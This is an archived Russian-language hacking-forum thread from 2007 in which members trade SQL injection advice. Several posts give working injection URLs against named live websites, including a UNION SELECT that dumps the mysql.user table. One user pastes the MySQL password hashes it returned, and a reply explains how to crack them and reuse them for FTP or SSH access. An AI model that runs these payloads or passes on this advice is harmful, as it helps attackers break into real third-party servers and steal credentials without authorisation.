ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
06.11.2007, 15:38
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
1ten0.0net1, спасибо
|
|
|
06.11.2007, 17:13
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
Как можно замутить иньекцию если стоит запрос
$mysql_query="SELECT * FROM что-то ORDER BY".$_GET['sb'];
?
|
|
|
|
06.11.2007, 17:54
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Хм... никак.... Тут даже посимвольный брут не канает...
__________________
Кто я?..
|
|
|
|
06.11.2007, 18:05
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
понятно  |
|
|
|
06.11.2007, 18:30
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от I-I()/Ib
Хм... никак.... Тут даже посимвольный брут не канает...
эх ошибаешься, ой ошибаешься...
здесь можно замутить инъекцию, для этого обязательно должен быть вывод даннных на страницу, а дальше с помощью подзапросов, как говорит I-I()/Ib, с помощью посимвольного брута, но это не всегда возможно
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 06.11.2007 в 18:36..
|
|
|
|
06.11.2007, 18:36
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от gemaglabin
Обьявляется миниконкурс на запрос с Order By , приз - плюсы посетивших страницу.
Гыыы я уже начал:
вот описание подобной инъекции в движке рейтинга сайтов:
http://forum.antichat.ru/thread51884.html
еще наглядный пример инъекции после order by в движке статистики psychostat
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 06.11.2007 в 18:40..
|
|
|
|
06.11.2007, 19:49
|
|
Новичок
Регистрация: 03.11.2007
Сообщений: 1
Провел на форуме:
2641
Репутация:
0
|
|
ребята вот нашол плохую фильтрацию
http://tien.ru/?p=7&GroupID=20'
как дальше разрабатывать sql иньекцию, если можно на примере, заранее благодарен
|
|
|
|
06.11.2007, 22:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от pisylok
ребята вот нашол плохую фильтрацию
http://tien.ru/?p=7&GroupID=20'
как дальше разрабатывать sql иньекцию, если можно на примере, заранее благодарен
плохо то, что это Microsoft Access и здесь нет возможности отбросить (закомментировать) часть запроса, даже %00 в данном случае фильтруется (покрайне мере неработает)
для эксплуатации этой скули можно использовать подзапросы для этого надо подобрать название таблицы и соответственно название поля, вот пример рабочего подзапроса:
Код:
http://tien.ru/?p=7&GroupID=20') and (mid((select top 1 id from news),1,1)<'a
если хочешь что-то получить из этой скули, подбирай имя таблицы с пользователями и соответственно колонки с полезной информацией
__________________
Карфаген должен быть разрушен...
|
|
|
|
07.11.2007, 13:30
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
у меня при таком запросе
http://www.aphoto.ru/news/news.php?nid=-23+union+select+1,2,mysql.user.password,4+from+mys ql.user/*
сайт выдаёт такие хеши:
*0380AF57CC89BDDCEB2E4F020087C5660FB8467C
*52868E15C27788B69F9716CF4C3762C430D7FA49
*1AEF7A19D6DE950A96EE5CCDD3388618C30C95E6
*7EBF4B5C89AA3609F2AD90A4D19046F30C15FF9B
*7EF015DF6D56998DC460036F742293B666BCBDA4
у меня вопрос, какого типа эти хеши, на мд5 непохоже, и от чего они, как я могу их испольховать когда расшифрую
|
|
|
|
07.11.2007, 13:45
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
это хеши mysql5 использовать ты сможешь их для подключения к БД,
только лучше сделать такой запрос:
Код:
http://www.aphoto.ru/news/news.php?nid=-23+union+select+1,2,concat(host,0x3a,user,0x3a,password),4+from+mysql.user/*
и мы видим что с правами root можно подключится без пароля, но для этого нужен какой нибудь mysql клиент, на этом сервере, например phpMyAdmin
но я советую попробовать их "расшифровать", т.к. иногда пароли от БД подходят и для других сервисов например ftp или ssh
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 07.11.2007 в 13:53..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
